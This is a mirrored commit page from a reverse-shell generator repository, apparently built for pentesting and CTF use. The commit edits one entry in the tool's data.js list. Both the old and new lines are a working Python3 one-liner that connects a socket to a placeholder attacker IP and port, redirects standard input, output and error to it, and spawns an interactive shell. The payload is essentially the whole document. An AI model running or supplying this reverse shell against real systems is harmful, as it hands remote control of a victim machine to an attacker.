mirror of
https://github.com/0dayCTF/reverse-shell-generator.git
synced 2025-02-23 15:04:42 +00:00
Update data.js
Added shortest Python3 payload
This commit is contained in:
parent
95bf316ee7
commit
162b8b7a9a
@ -200,7 +200,7 @@ const reverseShellCommands = withCommandType(
|
|||||||
},
|
},
|
||||||
{
|
{
|
||||||
"name": "Python3 shortest",
|
"name": "Python3 shortest",
|
||||||
"command": "python3 -c'import os,pty,socket;s=socket.socket();s.connect((\"{ip}\",{port}));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\"{shell}\")'",
|
"command": "python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\"{ip}\",{port}));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\"{shell}\")'",
|
||||||
"meta": ["linux"]
|
"meta": ["linux"]
|
||||||
},
|
},
|
||||||
{
|
{
|
||||||
|
Loading…
Reference in New Issue
Block a user